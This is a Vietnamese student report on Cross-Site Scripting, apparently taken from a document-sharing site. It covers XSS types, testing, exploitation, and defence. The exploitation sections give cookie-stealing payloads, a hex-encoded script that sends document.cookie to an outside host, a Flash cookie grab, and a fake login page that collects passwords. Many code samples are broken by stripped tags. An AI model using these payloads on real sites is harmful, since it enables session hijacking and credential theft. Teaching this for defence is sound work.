Báo cáo Đề tài Kỹ thuật tấn công XSS
Bạn đang xem 20 trang mẫu của tài liệu "Báo cáo Đề tài Kỹ thuật tấn công XSS", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Tài liệu đính kèm:
- bao_cao_de_tai_ky_thuat_tan_cong_xss.pdf
Nội dung text: Báo cáo Đề tài Kỹ thuật tấn công XSS
- HỌC VIỆN CÔNG NGHỆ BƢU CHÍNH VIỄN THÔNG AN NINH MẠNG 1 CƠ SỞ TP.HCM BÁO CÁO ĐỀ TÀI MÔN HỌC AN NINH MẠNG KỸ THUẬT TẤN CÔNG XSS Giảng viên hướng dẫn : ThS. LÊ PHÚC Sinh viên thực hiện : TRẦN ĐÌNH NGỌC MãSV: 407170045 Lớp : D07THM1
- AN NINH MẠNG 2 Mục lục I. GIỚI THIỆU CHUNG 4 II. GIỚI THIỆU VỀ XSS 5 1. Tìm hiểu XSS 5 2. Hai hình thức tồn tại của XSS 5 2.1. Stored XSS 5 2.2. Reflected XSS 6 3. Mức độ nguy hiểm của XSS 7 4. Mục tiêu mà XSS hƣớng tới. 8 III.HOẠT ĐỘNG CỦA XSS 9 IV.CẢNH GIÁC VỚI XSS 12 V. KIỂM TRA LỖI XSS 14 1. Sử dụng Tool 14 2. Thử bằng Code 14 VI. KHAI THÁC LỖI XSS 16 1.Tóm tắt các bƣớc thực hiện 17 2. Các cách thực hiện 18 2.1. Nghiên cứu cách lấy cookies: 18 2.2.Nghiên cứu cách lấy account. 18 2.3. Tấn Công XSS Bằng Flash 19 3. Attacker dùng XSS để lừa đảo 22 4. Cách vƣợt qua cơ chế lọc ký tự 22
- AN NINH MẠNG 3 VII. PHÒNG CHỐNG XSS 23 1. Với những dữ liệu ngƣời thiết kế và phát triển ứng dụng Web 23 2. Đối với ngƣời dùng. 26 VIII. PHẠM VI VÀ TÍNH KHẢ THI CỦA PHƢƠNG PHÁP TẤN CÔNG BẰNG XSS 27 IX. ĐÁNH GIÁ 27 TÀI LIỆU THAM KHẢO: 28
- AN NINH MẠNG 4 I. GIỚI THIỆU CHUNG Website ngày nay rất phức tạp và thƣờng là các web động, nội dung của web đƣợc cập nhật thông qua các thành viên tham gia ở khắp mọi nơi trên thế giới. Và hầu hết các website này dùng Cookie để xác thực ngƣời dùng. Điều này đồng nghĩa với việc Cookie của ai thì ngƣời đó dùng, Nếu lấy đƣợc Cookie ngƣời dùng nào Hacker sẽ giả mạo đƣợc chính ngƣời dùng đó(điều này là hết sức nguy hiểm). Vậy làm sao để các hacker có thể lấy cookie của bạn? Có rất nhiều cách để các hacker làm việc đó, ở đây tôi xin trình bày một trong những cách mà hacker thƣờng dùng, đó chính là họ nhờ vào lỗi Cross Site Scripting(XSS). Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiện nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những ngƣời sử dụng web. Bất kì một website nào cho phép ngƣời sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS. XSS đƣợc thực hiện trên các thẻ JavaScript, và các thẻ JavaScript chúng có thể làm đƣợc những công việc sau: 1. Thay đổi cấu trúc của toàn bộ trang web. 2. Tạo tùy ý các phần tử HTML. 3. Định tuyến lại các hình thức liên kết 4. Phục hồi dữ liệu, xác thực 5. Gửi và nhận dữ liệu 6. Đọc các tổ hợp phím.
- AN NINH MẠNG 5 II. GIỚI THIỆU VỀ XSS 1. Tìm hiểu XSS Cross-Site Scripting hay còn đƣợc gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP ) những thẻ HTML hay những đoạn mã script nguy hiểm có khả năng đánh cắp hay thiết lập đƣợc những thông tin quan trọng nhƣ cookies, mật khẩu, usename . Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết đƣợc viết bằng các Client-Site Script nhƣ JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML. Phƣơng pháp này không nhằm vào máy chủ hệ thống mà chủ yếu tấn công trên chính máy ngƣời sử dụng. Hacker sẽ lợi dụng sự kiểm tra lỏng lẻo từ ứng dụng và hiểu biết hạn chế của ngƣời dùng cũng nhƣ biết đánh vào sự tò mò của họ dẫn đến ngƣời dùng bị mất thông tin một cách dễ dàng. Thông thƣờng hacker lợi dụng địa chỉ URL để đƣa ra những liên kết là tác nhân kích hoạt những đoạn chƣơng trình đƣợc viết bằng ngôn ngữ máy khách nhƣ VBScript, JavaScript đƣợc thực thi trên chính trình duyệt của nạn nhân 2. Hai hình thức tồn tại của XSS 2.1. Stored XSS Stored XSS là hình thức tấn công mà ở đó cho phép kẻ tấn công có thể chèn một đoạn script nguy hiểm (thƣờng là Javascript) vào website của chúng ta thông qua một chức năng nào đó (vd: viết lời bình, guestbook, gởi bài ), để từ đó khi các thành viên khác truy cập website sẽ bị dính mã độc từ kẻ tấn công này, các mã độc này thƣờng đƣợc lƣu lại trong database của website chúng ta nên gọi là Stored. Stored XSS phát sinh do chúng ta không lọc dữ liệu do thành viên gởi lên một cách đúng đắn, khiến cho mã độc đƣợc lƣu vào Database của website.
- AN NINH MẠNG 6 2.2. Reflected XSS Trong hình thức này, kẻ tấn công thƣờng gắn thêm đoạn mã độc vào URL của website chúng ta và gởi đến nạn nhân, nếu nạn nhân truy cập URL đó thì sẽ bị dính mã độc. Điều này xảy ra do ta không chú ý filter input từ URL của website mình.
- AN NINH MẠNG 7 Tấn công XSS là tấn công nguy hiểm, cho phép kẻ tấn công ăn cắp thông tin trên máy nạn nhân thông qua javascript nhƣ ăn cắp cookie, chèn mã độc để chiến quyền điều khiển XSS là một trong những lỗi phổ biến, có rất nhiều trang web bị mắc phải lỗi này, chính vì thế ngày càng có nhiều ngƣời quan tâm đến lỗi này. Gần đây, theo Brian Krebs của tờ Washington Post báo cáo rằng hàng ngàn trang web không an toàn đã đƣợc xác định vào năm ngoái, và trang Xssed.com đưa ra danh sách gần 13.000 trang trong đó có nhiều lỗ hổng cross-site scripting (XSS). Ví dụ 1: Một đoạn url mà hacker chèn Script vào để lấy cookie của ngƣời dùng. xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E 3. Mức độ nguy hiểm của XSS Theo thống kê về các lỗ hổng bảo mật thƣờng bị tấn công nhất vào năm 2009
- AN NINH MẠNG 8 Cross-Site Scripting (XSS) chiếm một tỉ lệ rất cao so với các phƣơng pháp tấn công khác. Kĩ thuật XSS đƣợc mô tả lần đầu tiên cách đây 5 năm (từ năm 2007 đến 2011) và hầu hết các khả năng tiềm ẩn của kĩ thuật này đã đƣợc biết đến. Tuy nhiên chúng ta mới chỉ khắc phục đƣợc một phần của nó. Không phải vô tình mà Yahoo Mail lại để sót một lỗi XSS trong bộ lọc của mình. Một phƣơng pháp tối ƣu vẫn còn đang ở phía trƣớc. 4. Mục tiêu mà XSS hướng tới. XSS khai thác thƣờng đƣợc sử dụng để đạt đƣợc các kết quả độc hại sau đây: * Truy cập thông tin nhạy cảm hoặc bị hạn chế * Ăn cắp tiền (giao dịch ngân hàng, mua hàng online .) * Theo dõi thói quen lƣớt web của ngƣời dùng * Thay đổi năng của trình duyệt * Bôi nhọ danh tiếng của một cá nhân hay công ty * Hủy hoại ứng dụng Web. * Tấn công từ chối dịch vụ
- AN NINH MẠNG 9 III.HOẠT ĐỘNG CỦA XSS XSS cho phép attacker chèn các đoạn mã vào link của đƣờng dẫn, để thực hiện trên trình duyệt của ngƣời dùng, dẫn đến việc mất cookies, mật khẩu, session hay chèn virus Thƣờng thì XSS có dạng nhƣ sau: alert(“Lỗi XSS”) . Và nội dung xuất hiện trên trình duyệt là một cái popup có thông tin là „Lỗi XSS‟. Ở trên ví dụ 1 trên chỉ minh họa một cách đơn giản là thêm đoạn mã của mình vào trang Web thông qua URL. Nhƣng thực sự thì có rất nhiều cách để thêm đoạn mã JavaScript với mục đích tấn công kiểu XSS. Hacker có thể dễ dàng lợi dụng Document Object Model (DOM) để thay đổi ngữ cảnh và nội dụng Web ứng dụng. Ví dụ 2: Sau đây là danh sách nơi có thể chèn đoạn mã: & [code] &{[code]}; [code] ">
- AN NINH MẠNG 10 [code] [code] " onmouseover="[code]"> (tài liệu từ 15/0) Phần in đậm là phần có thể đặt đoạn mã đánh cắp thông tin. Về cơ bản XSS cũng giống nhƣ SQL Injection hay Source Injection, nó cũng là các yêu cầu (request) đƣợc gửi từ các máy client tới server nhằm chèn vào đó các thông tin vƣợt quá tầm kiểm soát của server Nó có thể là một request đƣợc gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các URL nhƣ là : alert('XSS was found !'); Và rất có thể trình duyệt của bạn sẽ hiện lên một thông báo "XSS was found !". Các đoạn mã trong thẻ script không hề bị giới hạn bởi chúng hoàn toàn có thể thay thế bằng một file nguồn trên một server khác thông qua thuộc tính src của thẻ script. Cũng chính vì lẽ đó mà chúng ta chƣa thể lƣờng hết đƣợc độ nguy hiểm của các lỗi XSS. Nhƣng nếu nhƣ các kĩ thuật tấn công khác có thể làm thay đổi đƣợc dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì XSS chỉ gây tổn hại đối
- AN NINH MẠNG 11 với website ở phía client mà nạn nhân trực tiếp là những ngƣời khách duyệt site đó. Tất nhiên đôi khi các hacker cũng sử dụng kĩ thuật này đề deface các website nhƣng đó vẫn chỉ tấn công vào bề mặt của website. Thật vậy, XSS là những Client-Side Script, những đoạn mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh hƣởng đến hệ thống website nằm trên server. Mục tiêu tấn công của XSS không ai khác chính là những ngƣời sử dụng khác của website, khi họ vô tình vào các trang có chứa các đoạn mã nguy hiểm do các hacker để lại họ có thể bị chuyển tới các website khác, đặt lại homepage, hay nặng hơn là mất mật khẩu, mất cookie thậm chí máy tính bạn có thể sẽ bị cài các loại virus, backdoor, worm Trong kĩ thuật XSS thƣờng thì các link mà hacker dùng đều đã đƣợc mã hóa nên ngƣới dùng khó mà phát hiện ra. Sau đây là cách mã hoá(HEX) các kí tự thƣờng dùng trong lỗi XSS của thanh AddressBar của Browser.
- AN NINH MẠNG 12 Ví dụ 3: Một địa chỉ đã đƣợc mã hóa HEX. ">%3C%73%63%72%69%70%74%20%73% 72%63%25%33%44%68%74%74%70%25%33%41%25%32%46%25%32%46%6A %73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73%25%32%46%78%73%73 %2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E IV.CẢNH GIÁC VỚI XSS Có lẽ không cần liệt kê những nguy hiểm của XSS, nhƣng trên thực tế nếu bạn có một chút hiểu biết về XSS bạn sẽ không còn phải sợ chúng nữa. Thật vậy bạn hoàn toàn có thể tránh khỏi việc bị tấn công bởi những lỗi XSS nếu hiểu kĩ về nó. Các thẻ HTML đều có thể là công cụ cho các cuộc tấn công bởi kĩ thuật XSS, trong đó 2 thẻ IMG và IFRAME có thể cho phép trình duyệt của bạn load thêm các website khác khi các lệnh HTML đƣợc hiển thị. Ví dụ nhƣ BadTrans Worm một loại worm sử dụng thẻ IFRAME để lây lan trong các hệ thống có sử dụng Outlook hay Outlook Express: ===_ABC1234567890DEF_=== Content-Type: multipart/alternative; boundary="===_ABC0987654321DEF_===" ===_ABC0987654321DEF_=== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ===_ABC0987654321DEF_=== ===_ABC1234567890DEF_===
- AN NINH MẠNG 13 Content-Type: audio/x-wav; name="filename.ext.ext" Content-Transfer-Encoding: base64 Content-ID: Đôi khi đang đọc thƣ bạn bị chuyển sang một website khác, bạn có nghĩ rằng bạn có thể mất mật khẩu. Trƣớc đây, hàng loạt các hộp thƣ của Yahoo bị mất mật khẩu hay bị đọc trộm thƣ mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thƣ mà không hề cảnh giác với XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn mã HTML gửi trong thƣ bạn đã hoàn toàn bị mất cookie của mình: Vậy là khi bạn nhận thƣ, và nếu bạn vô tình đƣa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy đƣợc, các hacker có thể dễ dàng login hòm thƣ của bạn mà không cần biết mật khẩu của bạn. Thực sự tôi cũng rất bất ngờ khi tìm thấy rằng Yahoo khi đó đã ngăn đƣợc hầu hết các mối đe doạ từ các thẻ HTML lại bỏ qua thẻ IMG. Tuy nhiên cho tới ngày 12/7/2003 Yahoo đã kịp thời vá lỗ hồng nghiêm trọng này, nhƣng không phải vì vậy mà bạn mất cảnh giác với những "lỗi" của website. Nếu nhƣ bạn gặp một liên kết có dạng: document.cookie) Chắc chắn bạn sẽ phải xem xét kĩ trƣớc khi click vào. Có thể là sẽ tắt JavaScript cho trình duyệt của bạn trƣớc khi click vào hay ít nhất cũng có một chút cảnh giác. Nhƣng nếu bạn gặp một liên kết nhƣ thế này thì sao: 72%79%3D
- AN NINH MẠNG 14 Đó thực chất chính là liên kết ban đầu nhƣng chỉ khác nó đã đƣợc mã hoá. Một phần kí tự của liên kết đã đƣợc thay thế bởi mã HEX của nó, tất nhiên trình duyệt của bạn vẫn hiểu địa chỉ đó thực sự là gì. Bởi vậy bạn có thể sẽ gặp phải các đoạn mã nguy hiểm nếu nhƣ bạn mất cảnh giác với XSS. Tất nhiên còn rất nhiều những kiểu tấn công khác, trong đó có những kiểu đã đƣợc tìm ra có những kiều chƣa lƣờng hết đƣợc, những trong khuôn khổ bài viết này tôi hi vọng với một vài ví dụ vừa rồi, các bạn cũng đã hiểu phần nào về XSS. V. KIỂM TRA LỖI XSS Nếu nhƣ các bạn sử dụng các mã nguồn của các chƣơng trình có sẵn bạn có thể tham khảo danh sách các lỗ hổng của chƣơng trình bạn trên các trang web chứa các thông tin về bảo mật nhƣ securityfocus.com, securiteam.com Tuy nhiên nếu các website đƣợc tự viết mã nguồn thì bạn không thể áp dụng phƣơng pháp trên. Trong trƣờng hợp này bạn cần đến các chƣơng trình scanner tự động. Nếu nhƣ bạn sử dụng trong môi trƣờng Windows bạn có thể dùng N-Stealth hay AppScan, đó là những chƣơng trình scan khá tuyệt, bạn không chỉ kiểm tra đƣợc các lỗi XSS mà nó còn cho phép bạn kiểm tra các lỗi khác trong Website đó, Server đó. Tất nhiên đâu phải lúc nào bạn cũng cần kiểm tra tất cả, nếu nhƣ bạn chỉ muốn kiểm tra các lỗi XSS có trong website, bạn chỉ cần sử dụng screamingCSS. Đó là một Perl Script sẽ mở các kết nối tới website (sử dụng Perl's socket) để kiểm tra các lỗi XSS của bạn. Hơn nữa bạn có thể sử dụng nó trong cả môi trƣờng Unix lẫn Windows. Và chúng ta có thể đưa ra hai cách chính sau: 1. Sử dụng Tool Sử dụng nhiều chƣơng trình dò quét lỗi của ứng dụng web, ví dụ nhƣ chƣơng trình Web Vulnerability Scanner để dò quét lỗi XSS. 2. Thử bằng Code Thực hiện 5 bƣớc: Bước 1: Mở website cần kiểm tra Bước 2: Xác định các chỗ (phần) cần kiểm tra XSS. 1 Site bất kỳ bao giờ cũng có
- AN NINH MẠNG 15 các phần: Search, error message, web form. Chủ yếu lỗi XSS nằm ở phần này, nói chung XSS có thể xảy ra ở chỗ nào mà ngƣời dùng có thể nhập dữ liệu vào và sau đó nhận đƣợc một cái gì đó. Ví dụ chúng ta nhập vào chuỗi „XSS‟ Bước 3: Xác minh khả năng site có bị lỗi XSS hay không bằng cách xem các thông tin trả về. Ví dụ chúng ta thấy thế này: „Không tìm thấy XSS ‟ , hay là „Tài khoản XSS không chính xác‟, „Đăng nhập với XSS không thành công‟ thì khi đó khả năng chỗ đó bị dính XSS là rất cao. Bước 4: Khi đã xác định chỗ có khả năng bị dính lỗi XSS thì chúng ta sẽ chèn những đoạn code của chúng ta vào để thử tiếp, ví dụ nhƣ sau: Chèn đoạn code này: alert('XSS') vào ô bị lỗi và nhấn nút Submit, nếu chúng ta nhận đƣợc một popup có chữ „XSS‟ thì 100% bị dính XSS. Ta có thể nhập vào form lỗi các thẻ sau: alert('CSS Vulnerable') &{alert('CSS Vulnerable') }; window.open( “ ” ) Ví dụ 4: Thông báo cho biết chắc chắn web đã bị lỗi XSS.
- AN NINH MẠNG 16 Nhƣng xin chú ý , thỉnh thoảng vẫn có trƣờng hợp website đó bị dính XSS nhƣng vẫn không xuất hiện cái popup thì buộc lòng bạn phải VIEW SOURCES (mổ bụng) nó ra để xem . Khi view sources nhớ kiếm dòng này alert('XSS) , nếu có thì chắc chắn là website đó lỗi XSS 100%. Gọi là site bị dính lỗi XSS và ta tìm đƣợc nơi bị lỗi nhƣ thế này : nghĩa là ta có thể chèn code ngay trên thanh ADDRESS. Bước 5: Lên kế hoạch kịch bản tấn công VI. KHAI THÁC LỖI XSS Khác với các lỗi khác là gây hại trực tiếp lên hệ thống chứa web site, còn XSS lại không gây hại đến hệ thống của sever mà đối tƣợng tấn công chủ yếu của XSS lại là ngƣời dùng! Ứng dụng Web thƣờng lƣu trữ thông tin quan trọng ở cookie. Cookie là mẩu thông tin mà ứng dụng lƣu trên đĩa cứng của ngƣời sử dụng. Nhƣng chỉ ứng dụng thiết lập ra cookie thì mới có thể đọc nó. Do đó chỉ khi ngƣời dùng đang trong phiên làm việc của ứng dụng thì hacker mới có cơ hội đánh cắp cookie. Công việc đầu tiên của hacker là tìm trang đích để dụ ngƣời dùng đăng nhập sau khi đã tìm ra lỗ hổng trên ứng dụng đó. Sau đây là các bƣớc khai thác XSS theo truyền thống:
- AN NINH MẠNG 17 1.Tóm tắt các bước thực hiện Bước 1: Hacker biết đƣợc ngƣời dùng đang sử dụng một ứng dụng Web có lỗ hỏng XSS. Bước 2: Ngƣời dùng nhận đƣợc 1 liên kết thông qua email hay trên chính trang Web (nhƣ trên guestbook, banner dễ dàng thêm 1 liên kết do chính hacker tạo ra ). Thông thƣờng hacker khiến ngƣời dùng chú ý bằng những câu kích thích sự tò mò của ngƣời dùng nhƣ “ Kiểm tra tài khoản”, “Một phần thƣởng hấp dẫn đang chờ bạn” Bước 3: Chuyển nội dung thông tin (cookie, tên, mật khẩu ) về máy chủ của hacker. Bước 4: Hacker tạo một chƣơng trình cgi (ở ví dụ 3 này là steal.cgi) hoặc một trang Web để ghi nhận những thông tin đã đánh cắp vào 1 tập tin Bước 5: Sau khi nhận đƣợc thông tin cần thiết, hacker có thể sử dụng để thâm nhập vào tài khoản của ngƣời dùng.
- AN NINH MẠNG 18 2. Các cách thực hiện Để hiểu rõ hơn về các tấn công XSS chúng ta xem xét ví dụ thực tế sau: 2.1. Nghiên cứu cách lấy cookies: Thứ nhất: Bạn hãy tạo một file info.txt và upload lên host của bạn. Thứ hai: Tạo file cookie.asp hoặc cookie.php có nội dung sau và upload file này lên host của bạn nhƣ sau: Thứ ba: Trên những phần trả lời hay góp ý trên diễn đàn hoặc email hoặc website (bị lỗi XSS) chúng ta để một link có lời giới thiệu hay thông báo gây chú ý (có hostname là của trang web bị nhiễm XSS) dạng nhƣ sau : http:// hostxss.com /search.cgi?query= alert(document.cookie) hoặc http:// hostxss.com /search.cgi?%71%75 72%69%70%74%3E (đã đƣợc mã hóa) 2.2.Nghiên cứu cách lấy account. Thứ nhất: Bạn hãy tạo một file info.txt và upload lên host của bạn. Thứ hai: Tạo thêm một file xss.js và cũng upload file này lên host của bạn: File này là để tạo ra một facesite (trang web giả giống trang web thật) để khi ngƣời dùng nhập username và password thì chúng ta sẽ điều hƣớng và lƣu thông tin trên file info.txt.
- AN NINH MẠNG 19 document.body.innerHTML=„ Thông tin đăng nhập Tên đăng nhập: Mật khẩu: ' Thứ ba: Chúng ta để một link có lời giới thiệu hay thông báo gây chú ý (có hostname là của trang web bị nhiễm XSS) . Khi đó tạo một link dạng nhƣ sau và gửi mail hay up link lên trang web có nhiễm XSS: (sau hostname ta thêm thẻ Script vào) http:// hostxss.com /search.php?s="> Khi đó bên phía ngƣời dùng sẽ có một trang web giả mạo(face site): Ngƣời dùng không phát hiện ra và khi đăng nhập thì cookie hay usename và password sẽ đƣợc lƣu lại trong file info.txt trên server của hacker. 2.3. Tấn Công XSS Bằng Flash Ngoài những cách đƣa một đoạn mã nguy hiểm thì hacker còn có thể lợi dụng những tập tin flash để đánh cắp thông tin. Macromedia Flash cho phép lập trình bằng một ngôn ngữ kịch bản đã đƣợc xây dụng sẵn trong Flash là ActionScript. ActionScript có cú pháp đơn giản và tƣơng tự nhƣ JavaScript, C hay PERL. Ví dụ hàm getURL() dùng để gọi một trang web khác, tham số thƣờng là một URL chẳng hạn nhƣ “ ”. Ví dụ 5: getURL(“ ”) Tuy nhiên có thể thay thế URL bằng JavaScript: getURL(“javascript:alert(document.cookie)”)
- AN NINH MẠNG 20 Ví dụ trên sẽ làm xuất hiện bảng thông báo chứa cookie của trang web chứa tập tin flash đó. Nhƣ vậy là trang web đó đã bị tấn công, bằng cách chèn một đoạn JavaScript vào ứng dụng Web thông qua tập tin flash. Một ví dụ khác rõ hơn về cách tấn công này là: Đây là đoạn lệnh trong tập tin flash và sẽ đƣợc thi hành khi tập tin flash đƣợc đọc: getURL(“javascript:location(„ ‟+do cument.cookie)”) Nhƣ vậy là khi ngƣời dùng xem trang web chứa tập tin flash này thì ngay lập tức cookie của họ do trang web chứa tập tin flash đó tạo ra sẽ gửi về cho hacker. Cách viết Action Scipt trong Flash DeviantArt là một trang web nổi tiếng, cho phép thành viên của nó gửi các tập tin flash lên cho mọi thành viên cùng xem. Vì thế hacker có thể ăn cắp cookie của các thành viên và cũng có thể là tài khoản của ngƣời quản trị web, bằng cách đăng kí làm thành viên của ứng dụng Web này, gửi tập tin flash lên máy chủ và đợi các nạn nhân xem tập tin flash đó. Dƣới đây là địa chỉ liên kết dến một tập tin flash nhƣ đã trình bày trong ví dụ trên. Ngoài ra các trang web cho phép thành viên gửi dữ liệu dạng HTML nhƣ diễn đàn, các chức năng tạo chữ kí riêng, cũng có thể là mục tiêu của cách tấn công này, bằng cách nhập đoạn mã gọi tập tin flash vào. <OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8- 444553540000" codebase="
- AN NINH MẠNG 21 h/s wflash.cab#version=6,0,0,0" WIDTH="60" HEIGHT="48" id="1" ALIGN="">
- AN NINH MẠNG 22 3. Attacker dùng XSS để lừa đảo Ngoài việc lấy cookies, các attacker còn có thể hƣớng trình duyệt của ngƣời dùng đến trang web mà Attacker thiết kế sẵn! Sau khi attacker đã có thông tin về lỗi XSS, họ có thể dùng IFRAME, code nhƣ sau: ( đoạn này dùng để mở 1 trang web mà ngƣời không biết!) Ngoài ra bạn hoàn toàn có thể dùng hàm open, close window để chuyển hƣớng web sang một trang web khác bạn muốn. Còn cách này hay hơn : Dùng hàm write. In ra một thẻ div đặt độ rộng là 1024, cao 800. possion : absulitly, left=0, top=0. Nhƣ vậy là cái div vừa tạo sẽ che toàn bộ màn hình, thế là ngƣời dùng đã vào trang lừa đảo của các attacker! Attacker có thể lợi dụng lỗi này để fishing trên các Hệ thống thanh toán, game, shopping, Ngân hàng, Tín dụng hoặc là chèn virus! 4. Cách vượt qua cơ chế lọc ký tự Nhiều coder khôn khéo lọc hết các kỹ tự đặc biệt nhƣ ' hay + để tránh các việc chèn lệnh trên URL để tấn công SQL hay XSS nhƣng một attacker cao tay sẽ dễ dàng giải quyết việc này bằng cách sử dụng mã hóa HEX thay thế để khai thác Hex Usage: 74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
- AN NINH MẠNG 23 3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63 %75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%6 3%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d% 65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72 %69%70%74%3e link site chuyển đổi sang số HEX: hoặc VII. PHÒNG CHỐNG XSS Nhƣ đã đề cập ở trên, một tấn công XSS chỉ thực hiện đƣợc khi gửi một trang web cho trình duyệt web của nạn nhân có kèm theo mã script độc của kẻ tấn công. Ngƣời ta không lƣờng hết đƣợc mức độ nguy hiểm của XSS nhƣng cũng không quá khó khăn để ngăn ngừa XSS. Có rất nhiều cách để có thể giải quyết vấn đề này. OWASP (The Open Web Application Standard Project) nói rằng để có thể xây dựng các website bảo mật cao đảm bảo những trang phát sinh động không chứa các tag của script, đối với các dữ liệu của ngƣời sử dụng bạn nên làm những việc sau: 1. Với những dữ liệu người thiết kế và phát triển ứng dụng Web Những dữ liệu, thông tin nhập của ngƣời dùng, ngƣời thiết kế và phát triển ứng dụng Web cần phải thực hiện vài bƣớc cơ bản sau: Chỉ chấp nhận những dữ liệu hợp lệ.
- AN NINH MẠNG 24 Từ chối nhận các dữ liệu hỏng. Liên tục kiểm tra và thanh lọc dữ liệu. Tạo ra danh sách những thẻ HTML đƣợc phép sử dụng, xóa bỏ thẻ hoặc đóng các thẻ Script trong thẻ coi đoạn Script đó nhƣ là một đoạn trích dẫn thôi. Lọc ra bất kì một đoạn mã JavaScript/Java/VBScript/ActiveX/Flash Related Lọc dấu nháy đơn hay kép Lọc kí tự Null Xóa những kí tự “ > ”, “ > ( ( ) ) # # & & Vẫn cho phép nhập những kí tự đặc biệt nhƣng sẽ đƣợc mã hóa theo chuẩn riêng Mã hóa Lỗi XSS có thể tránh đƣợc khi máy chủ Web đảm bảo những trang phát sinh đƣợc mã hóa (encoding) thích hợp để ngăn chạy chạy các script không mong muốn. Mã hóa phía máy chủ là một tiến trình mà tất cả nội dung phát sinh động sẽ đi qua một hàm mã hóa nơi mà các thẻ script sẽ đƣợc thay thể bởi mã của nó. Nói chung, việc mã hóa(encoding) đƣợc khuyến khích sử dụng vì nó không yêu cầu bạn phải đƣa ra quyết định những kí tự nào là hợp lệ hoặc không hợp lệ.Tuy nhiên việc mã hóa tất cả dữ liệu không đáng tin cậy có thể tốn tài nguyên và ảnh hƣởng đến khả năng thực thi của một số máy chủ Tuy nhiên trên thực tế, một số trƣờng hợp bạn phải chấp nhận mọi loại dữ liệu hay không có một bộ lọc phù hợp. Chính vì vậy bạn phải có những cách riêng để giải quyết. Một trong những cách hay sử dụng là bạn mã hoá các kí tự đặc biệt trƣớc khi in ra website, nhất là những gì có thể gây nguy hiểm cho ngƣời sử dụng. Trong
- AN NINH MẠNG 25 trƣờng hợp này thẻ script sẽ đƣợc đổi thành script. Nhƣ vậy nó sẽ vẫn đƣợc in ra màn hình mà không hề gây nguy hiểm cho ngƣời sử dụng. Tôi lấy ví dụ với script search.cgi với mã nguồn là: #!/usr/bin/perl use CGI; my $cgi = CGI->new(); my $query = $cgi->param('query'); print $cgi->header(); print "You entered $query"; Đây hoàn toàn là một script có lỗi bởi vì nó in ra trực tiếp dữ liệu đƣợc nhập vào. Dĩ nhiên là khi in ra, nó sẽ in ra dƣới dạng đoạn mã HTML, nhƣ thế nó không chỉ không in ra chính xác những dữ liệu vào một cách trực quan mà còn có tiềm ẩn lỗi XSS. Nhƣ đã nói ở trên, để có thể giải quyết vấn đề này, chúng ta có thể mã hoá các kí tự đặc biệt của HTML với hàm HTML::Entities::encode(). Nhƣ vậy ta có thể có một mã nguồn hoàn hảo hơn nhƣ sau: #!/usr/bin/perl use CGI; use HTML::Entities; my $cgi = CGI->new(); my $text = $cgi->param('text'); print $cgi->header(); print "You entered ", HTML::Entities::encode($text); Tất nhiên với phƣơng pháp này bạn cũng có thể áp dụng đối với các ngôn ngữ Web Application khác (ASP, PHP ). Để kiểm tra việc lọc và mã hoá dữ liệu trƣớc khi in ra, các bạn có thể dùng một chƣơng trình đƣợc viết bằng ngôn nhữ PHP, đặc biệt nó đƣợc thiết kế để phòng chống các lỗi XSS. Bạn có thể lấy mã nguồn chƣơng
- AN NINH MẠNG 26 trình từ /phpfilter.html Lọc và mã hoá các dữ liệu cho vấn là cách tốt nhất để chống XSS nhƣng nếu bạn đang sử dụng mod_perl trên Apache Server thì bạn có thể dùng ngay module Apache::TaintRequest. Khi đó mã nguồn chƣơng trình sẽ có dạng: use Apache::TaintRequest; my $apr = Apache::TaintRequest->new(Apache->request); my $text = $apr->param('text'); $r->content_type("text/html"); $r->send_http_header; $text =~ s/[^A-Za-z0-9 ]//; $r->print("You entered ", $text); 2. Đối với người dùng. Cần cấu hình lại trình duyệt để nhắc nhở ngƣời dùng có cho thực thi ngôn ngữ kịch bản trên máy của họ hay không? Tùy vào mức độ tin cậy mà ngƣời dùng sẽ quyết định Dùng Firefox: Có thể cài thêm tiện ích(Add-on Firefox) YesScript - kiểm soát script từ web Dùng IE thì ta có thể vào Options/Setting / chúng ta Disable Script. Tƣơng tự với Google Chrome và các trình duyệt khác. Khi chúng ta vào một trang web mới thì ta cần phải cân nhắc khi click vào các link, và với email chúng ta cần phải kiểm tra các link hay những hình ảnh quảng cáo thật kĩ. Và tóm lại chúng ta sẽ an toàn hơn khi có sự cảnh giác cao hơn.
